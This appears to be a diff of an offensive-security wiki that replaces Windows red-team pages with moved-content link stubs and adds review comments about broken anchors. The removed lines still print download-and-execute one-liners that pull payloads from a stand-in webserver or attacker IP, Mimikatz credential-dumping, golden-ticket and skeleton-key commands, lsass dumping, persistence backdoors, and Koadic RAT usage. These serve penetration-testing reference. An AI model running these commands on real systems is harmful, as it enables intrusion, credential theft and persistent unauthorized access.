* [Which Endpoint Protection is Using AMSI](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#which-endpoint-protection-is-using-amsi)
* [Patching amsi.dll AmsiScanBuffer by rasta-mouse](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse)
* [Dont use net webclient](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Dont-use-net-webclient)
* [Amsi ScanBuffer Patch from -> https://www.contextis.com/de/blog/amsi-bypass](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Amsi-ScanBuffer-Patch)
* [Forcing an error](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Forcing-an-error)
* [Disable Script Logging](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Disable-Script-Logging)
* [Amsi Buffer Patch - In memory](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Amsi-Buffer-Patch---In-memory)
* [Same as 6 but integer Bytes instead of Base64](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Same-as-6-but-integer-Bytes-instead-of-Base64)
* [Using Matt Graeber's Reflection method](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Using-Matt-Graebers-Reflection-method)
* [Using Matt Graeber's Reflection method with WMF5 autologging bypass](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Using-Matt-Graebers-Reflection-method-with-WMF5-autologging-bypass)
* [Using Matt Graeber's second Reflection method](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Using-Matt-Graebers-second-Reflection-method)
* [Using Cornelis de Plaa's DLL hijack method](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Using-Cornelis-de-Plaas-DLL-hijack-method")
* [Use Powershell Version 2 - No AMSI Support there](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Using-PowerShell-version-2)
* [Nishang all in one](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Nishang-all-in-one)
* [Adam Chesters Patch](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Adam-Chester-Patch)
* [AMSI.fail](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#amsifail)
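Review bot: the link on the "Using Cornelis de Plaa's DLL hijack method" line ends with a stray `"` before the closing parenthesis, so the quote becomes part of the URL and the link breaks. Most of the other anchors in this list are mixed case and keep dots (`#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse`, `#Dont-use-net-webclient`, `#Forcing-an-error`), while MkDocs generates lowercase heading ids with dots stripped, the form the first two entries and the last one already use (`#list-amsi-providers`, `#amsifail`); normalise the rest to that form or they will only land at the top of the target page. The "Same as 6 but integer Bytes instead of Base64" text also refers to a numbering this list does not have.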

View File

@@ -0,0 +1,9 @@
# Windows - DPAPI
:warning: Content of this page has been moved to [InternalAllTheThings/redteam/evasion/windows-dpapi](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/)
* [List Credential Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#list-credential-files)
* [DPAPI LocalMachine Context](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#dpapi-localmachine-context)
* [Mimikatz - Credential Manager & DPAPI](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#mimikatz---credential-manager--dpapi)
* [Hekatomb - Steal all credentials on domain](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#hekatomb---steal-all-credentials-on-domain)
* [DonPAPI - Dumping DPAPI credz remotely](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#donpapi---dumping-dpapi-credz-remotely)

View File

@@ -0,0 +1,19 @@
# Windows - Defenses
:warning: Content of this page has been moved to [InternalAllTheThings/redteam/evasion/windows-defenses](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/)
* [AppLocker](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#applocker)
* [User Account Control](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#user-account-control)
* [DPAPI](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#dpapi)
* [Powershell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#powershell)
* [Anti Malware Scan Interface](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#anti-malware-scan-interface)
* [Just Enough Administration](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#just-enough-administration)
* [Contrained Language Mode](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#constrained-language-mode)
* [Script Block Logging](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#script-block-logging)
* [Protected Process Light](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#protected-process-light)
* [Credential Guard](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#credential-guard)
* [Event Tracing for Windows](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#event-tracing-for-windows)
* [Windows Defender Antivirus](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-defender-antivirus)
* [Windows Defender Application Control](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-defender-application-control)
* [Windows Defender Firewall](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-defender-firewall)
* [Windows Information Protection](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-information-protection)
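Review bot: typo in the link text on the Constrained Language Mode line: "Contrained" should be "Constrained" (the anchor `#constrained-language-mode` is already spelled correctly).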

View File

@@ -1,106 +1,17 @@
# Windows - Download and execute methods # Windows - Download and execute methods
## Downloaded files location :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/windows-download-execute](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/)
- C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\ * [Downloaded files location](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#downloaded-files-location)
- C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir> * [Powershell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#powershell)
- C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV * [Cmd](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#cmd)
* [Cscript / Wscript](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#cscript-wscript)
## Powershell * [Mshta](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#mshta)
* [Rundll32](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#rundll32)
From an HTTP server * [Regasm / Regsvc](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#regasm-regsvc-subtee)
* [Regsvr32](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#regsvr32)
```powershell * [Odbcconf](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#odbcconf)
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex" * [Msbuild](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#msbuild)
``` * [Certutil](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#certutil)
* [Bitsadmin](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#bitsadmin)
From a Webdav server * [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#references)
```powershell
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
```
## Cmd
```powershell
cmd.exe /k < \\webdavserver\folder\batchfile.txt
```
## Cscript / Wscript
```powershell
cscript //E:jscript \\webdavserver\folder\payload.txt
```
## Mshta
```powershell
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
```
```powershell
mshta http://webserver/payload.hta
```
```powershell
mshta \\webdavserver\folder\payload.hta
```
## Rundll32
```powershell
rundll32 \\webdavserver\folder\payload.dll,entrypoint
```
```powershell
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
```
## Regasm / Regsvc @subTee
```powershell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
```
## Regsvr32 @subTee
```powershell
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
```
```powershell
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
```
## Odbcconf
```powershell
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
```
## Msbuild
```powershell
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
```
## Certutil
```powershell
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
```
```powershell
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
```
## Bitsadmin
```powershell
bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
```
## References
- [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)

View File

@@ -1,110 +1,20 @@
# Windows - Mimikatz # Windows - Mimikatz
![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png) :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/mimikatz](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/)
## Mimikatz - Execute commands * [Execute commands](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#execute-commands)
* [Extract passwords](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#extract-passwords)
Only one command * [LSA Protection Workaround](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#lsa-protection-workaround)
* [Mini Dump](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#mini-dump)
```powershell * [Pass The Hash](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#pass-the-hash)
PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit * [Golden ticket](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#golden-ticket)
``` * [Skeleton key](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#skeleton-key)
* [RDP Session Takeover](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#rdp-session-takeover)
Mimikatz console (multiple commands) * [RDP Passwords](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#rdp-passwords)
* [Credential Manager & DPAPI](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#credential-manager--dpapi)
```powershell * [Chrome Cookies & Credential](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#chrome-cookies--credential)
PS C:\temp\mimikatz> .\mimikatz * [Task Scheduled credentials](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#task-scheduled-credentials)
mimikatz # privilege::debug * [Vault](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#vault)
mimikatz # sekurlsa::logonpasswords * [Commands list](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#commands-list)
mimikatz # sekurlsa::wdigest * [Powershell version](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#powershell-version)
``` * [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#references)
## Mimikatz - Extract passwords
```powershell
mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
```
## Mimikatz - Mini Dump
Dump the lsass process.
```powershell
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
```
Then load it inside Mimikatz.
```powershell
mimikatz # sekurlsa::minidump lsass.dmp
Switch to minidump
mimikatz # sekurlsa::logonPasswords
```
## Mimikatz Golden ticket
```powershell
.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
```
```powershell
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
```
## Mimikatz Skeleton key
```powershell
privilege::debug
misc::skeleton
# map the share
net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
# login as someone
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
```
## Mimikatz commands
| Command |Definition|
|:----------------:|:---------------|
| CRYPTO::Certificates|list/export certificates|
|CRYPTO::Certificates | list/export certificates|
|KERBEROS::Golden | create golden/silver/trust tickets|
|KERBEROS::List | list all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current users tickets.Similar to functionality of “klist”.|
|KERBEROS::PTT | pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).|
|LSADUMP::DCSync | ask a DC to synchronize an object (get password data for account). No need to run code on DC.|
|LSADUMP::LSA | Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”|
|LSADUMP::SAM | get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.|
|LSADUMP::Trust | Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).|
|MISC::AddSid | Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016.|
|MISC::MemSSP | Inject a malicious Windows SSP to log locally authenticated credentials.|
|MISC::Skeleton | Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password.|
|PRIVILEGE::Debug | get debug rights (this or Local System rights is required for many Mimikatz commands).|
|SEKURLSA::Ekeys | list Kerberos encryption keys|
|SEKURLSA::Kerberos | List Kerberos credentials for all authenticated users (including services and computer account)|
|SEKURLSA::Krbtgt | get Domain Kerberos service account (KRBTGT)password data|
|SEKURLSA::LogonPasswords | lists all available provider credentials. This usually shows recently logged on user and computer credentials.|
|SEKURLSA::Pth | Pass- theHash and Over-Pass-the-Hash|
|SEKURLSA::Tickets | Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computers AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).|
|TOKEN::List | list all tokens of the system|
|TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box|
|TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials.
## Powershell Mimikatz
Mimikatz in memory (no binary on disk) with :
- [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1) from PowerShellEmpire
- [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1) from PowerSploit
More informations can be grabbed from the Memory with :
- [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1)
## References
- [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
- [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
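Review bot: the link text of the moved-page notice (`InternalAllTheThings/cheatsheets/mimikatz`) does not match the URL it points to (`.../cheatsheets/mimikatz-cheatsheet/`); align the text with the real path so readers can tell which page they are being sent to, as the other notices in this changeset do.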

View File

@@ -1,69 +1,40 @@
# Windows - Persistence # Windows - Persistence
## Userland :warning: Content of this page has been moved to [InternalAllTheThings/redteam/persistence/windows](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/)
### Registry * [Tools](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#tools)
* [Hide Your Binary](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#hide-your-binary)
Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. * [Disable Antivirus and Security](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#disable-antivirus-and-security)
* [Antivirus Removal](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#antivirus-removal)
```powershell * [Disable Windows Defender](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#disable-windows-defender)
Value name: Backdoor * [Disable Windows Firewall](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#disable-windows-firewall)
Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe * [Clear System and Security Logs](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#clear-system-and-security-logs)
``` * [Simple User](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#simple-user)
* [Registry HKCU](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#registry-hkcu)
### Startup * [Startup](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#startup)
* [Scheduled Tasks User](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#scheduled-tasks-user)
Create a batch script in the user startup folder. * [BITS Jobs](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#bits-jobs)
* [Serviceland](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#serviceland)
```powershell * [IIS](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#iis)
PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat * [Windows Service](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#windows-service)
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe * [Elevated](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#elevated)
``` * [Registry HKLM](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#registry-hklm)
* [Winlogon Helper DLL](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#)
### Scheduled Task * [GlobalFlag](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#)
* [Startup Elevated](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#startup-elevated)
```powershell * [Services Elevated](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#services-elevated)
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe" * [Scheduled Tasks Elevated](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#scheduled-tasks-elevated)
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta" * [Binary Replacement](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#binary-replacement)
PS C:\> $P = New-ScheduledTaskPrincipal "Rasta" * [Binary Replacement on Windows XP+](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#binary-replacement-on-windows-xp)
PS C:\> $S = New-ScheduledTaskSettingsSet * [Binary Replacement on Windows 10+](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#binary-replacement-on-windows-10)
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S * [RDP Backdoor](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#rdp-backdoor)
PS C:\> Register-ScheduledTask Backdoor -InputObject $D * [utilman.exe](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#utilman.exe)
``` * [sethc.exe](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#sethc.exe)
* [Remote Desktop Services Shadowing](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#remote-desktop-services-shadowing)
## Elevated * [Skeleton Key](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#skeleton-key)
* [Virtual Machines](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#virtual-machines)
### HKLM * [Windows Subsystem for Linux](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#windows-subsystem-for-linux)
* [Domain](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#domain)
Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows. * [Golden Certificate](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#golden-certificate)
* [Golden Ticket](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#golden-ticket)
```powershell * [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#references)
Value name: Backdoor
Value data: C:\Windows\Temp\backdoor.exe
```
### Services
Create a service that will start automatically or on-demand.
```powershell
PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."
```
### Scheduled Tasks
Scheduled Task to run as SYSTEM, everyday at 9am.
```powershell
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
```
## References
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
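Review bot: two of the new links are broken: "Winlogon Helper DLL" and "GlobalFlag" point at a bare `#` with no fragment, so they only jump to the top of the target page; fill in the section anchors. The `#utilman.exe` and `#sethc.exe` anchors keep the dot, which MkDocs strips when it generates heading ids (compare the neighbouring `#rdp-backdoor`), so they should read `#utilmanexe` and `#sethcexe`. The link text `InternalAllTheThings/redteam/persistence/windows` also differs from the URL path `.../redteam/persistence/windows-persistence/`.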

View File

@@ -1,123 +0,0 @@
# Koadic C3 COM Command & Control - JScript RAT
> Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.
## Installation
```powershell
git clone https://github.com/zerosum0x0/koadic
git submodule init
git submodule update
pip2.7 install -r requirements.txt --user
python2.7 koadic
```
## Set a listener
```powershell
use stager/js/mshta
set LHOST 192.168.1.19
set SRVPORT 4444
run
[>] mshta http://192.168.1.19:4444/6DX7f
```
```powershell
use stager/js/wmic
set LHOST 192.168.1.19
set SRVPORT 4444
run
[>] wmic os get /FORMAT:"http://192.168.1.19:4444/lQGx5.xsl"
```
### Stagers
Stagers hook target zombies and allow you to use implants.
Module | Description
--------|------------
stager/js/mshta | serves payloads using MSHTA.exe HTML Applications
stager/js/regsvr | serves payloads using regsvr32.exe COM+ scriptlets
stager/js/wmic | serves payloads using WMIC XSL
stager/js/rundll32_js | serves payloads using rundll32.exe
stager/js/disk | serves payloads using files on disk
## List zombies and interact with them
```powershell
(koadic: sta/js/wmic)$ zombies
ID IP STATUS LAST SEEN
--- --------- ------- ------------
0 192.168.1.30 Alive 2018-10-04 17:07:12
(koadic: sta/js/wmic)$ zombies 0
ID: 0
Status: Alive
First Seen: 2018-10-04 17:05:00
Last Seen: 2018-10-04 17:14:42
IP: 192.168.1.30
User: DESKTOP-68URA9U\CrashWin
[...]
Elevated: No
[...]
```
Interact with `zombies zombie_id`, get a shell with `cmdshell zombie_id`.
```powershell
[koadic: ZOMBIE 0 (192.168.1.30) - C:\Users\CrashWin]> whoami
[*] Zombie 0: Job 1 (implant/manage/exec_cmd) created.
[+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed.
Result for `cd C:\Users\CrashWin & whoami`:
desktop-68ura9u\crashwin
```
## Use an implant
Select an implant with `use module`, then fill the `info` with `set INFO value`, finally start the module with `run`.
```powershell
(koadic: sta/js/mshta)$ use implant/phish/password_box
(koadic: imp/phi/password_box)$ set ZOMBIE 1
(koadic: imp/phi/password_box)$ run
Input contents:
MyStrongPassword123!
```
### Implants
Implants start jobs on zombies.
Module | Description
--------|------------
implant/elevate/bypassuac_eventvwr | Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
implant/elevate/bypassuac_sdclt | Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10.
implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window.
implant/fun/voice | Plays a message over text-to-speech.
implant/gather/clipboard | Retrieves the current content of the user clipboard.
implant/gather/enum_domain_info | Retrieve information about the Windows domain.
implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive.
implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file.
implant/gather/user_hunter | Locate users logged on to domain computers (using Dynamic Wrapper X).
implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed).
implant/manage/enable_rdesktop | Enables remote desktop on the target.
implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output.
implant/phishing/password_box | Prompt a user to enter their password.
implant/pivot/stage_wmi | Hook a zombie on another machine using WMI.
implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals.
implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN.
implant/utils/download_file | Downloads a file from the target zombie.
implant/utils/multi_module | Run a number of implants in succession.
implant/utils/upload_file | Uploads a file from the listening server to the target zombies.
## References
- [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/)
- [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic)
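Review bot: the Koadic page is deleted outright with no pointer to where its content now lives, while the Windows - Privilege Escalation change in the same commit replaces the body with a `:warning: Content of this page has been moved to ...` stub that keeps inbound links working. For consistency, leave a one-line stub of the same shape here (title plus the new location, if the page was moved rather than dropped), so existing links to `# Koadic C3 COM Command & Control - JScript RAT` do not dead-end.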

View File

@@ -1,774 +1,68 @@
# Windows - Privilege Escalation # Windows - Privilege Escalation
## Summary :warning: Content of this page has been moved to [InternalAllTheThings/redteam/escalation/windows-privilege-escalation](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/)
* [Tools](#tools) * [Tools](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#tools)
* [Windows Version and Configuration](#windows-version-and-configuration) * [Windows Version and Configuration](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#windows-version-and-configuration)
* [User Enumeration](#user-enumeration) * [User Enumeration](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#user-enumeration)
* [Network Enumeration](#network-enumeration) * [Network Enumeration](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#network-enumeration)
* [EoP - Looting for passwords](#eop---looting-for-passwords) * [Antivirus Enumeration](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#antivirus-enumeration)
